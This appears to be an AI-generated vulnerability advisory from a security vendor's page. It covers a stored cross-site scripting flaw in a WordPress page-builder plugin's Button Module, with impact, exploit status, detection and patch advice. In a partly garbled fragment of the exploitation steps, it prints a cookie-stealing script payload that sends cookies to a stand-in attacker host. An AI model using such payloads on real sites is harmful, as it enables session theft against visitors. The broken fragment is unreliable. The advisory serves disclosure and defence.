
PEACH
Uma estrutura de isolamento de inquilino
CVE-2026-17090 is a Stored Cross-Site Scripting (XSS) vulnerability in the Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress. It affects all versions up to and including 2.10.2.2, stemming from insufficient input sanitization and output escaping in the Button Module's 'button' (Button Code) setting. The vulnerability was published on August 15, 2026, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, ENISA EUVD).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically in the Button Module's frontend rendering logic within modules/button/includes/frontend.js.php and related files (button.php, class-fl-builder-model.php). Authenticated attackers with Author-level access or above can inject arbitrary JavaScript into the Button Code setting, which is then stored and rendered without proper sanitization whenever a visitor loads the affected page. Beaver Builder's default access model grants editor-level access to any WordPress role holding the edit_posts capability, broadening the pool of potential attackers beyond typical editor roles (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker to persistently inject malicious scripts into WordPress pages, which execute in the browsers of any user who visits the compromised page. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site visitors and administrators. The changed scope (S:C) in the CVSS vector indicates that the impact extends beyond the plugin itself to affect end users' browsers (Wordfence, ENISA EUVD).
As of the publication date, there is no evidence of active in-the-wild exploitation, and no public proof-of-concept exploit code has been identified. The NVD SSVC assessment classifies exploitation as 'none' and the vulnerability as non-automatable, reflecting the requirement for authenticated access. The EPSS score is approximately 0.235%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, ENISA EUVD).
edit_posts capability).<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) that bypasses the insufficient sanitization.wp_posts or wp_postmeta database tables for entries containing <script>, javascript:, or encoded XSS payloads within Beaver Builder button module data.Site administrators should update the Beaver Builder Page Builder plugin to a version beyond 2.10.2.2, as the vulnerability affects all versions up to and including that release. The fix was introduced in the changeset available at the WordPress plugin repository. As a temporary workaround, restrict the edit_posts capability to trusted users only, limiting who can access the Beaver Builder editor. Monitoring plugin updates via the WordPress admin dashboard or the official plugin changelog is recommended (Wordfence, WordPress Trac Changeset).
Wordfence included CVE-2026-17090 in its weekly WordPress vulnerability report for August 10–16, 2026, as part of routine disclosure coverage. No notable independent researcher commentary or significant social media discussion has been identified beyond standard vulnerability aggregator coverage (Wordfence Blog).
Origem: Este relatório foi gerado usando IA
Avaliação de vulnerabilidade gratuita
Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.
Marque uma demonstração personalizada
"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."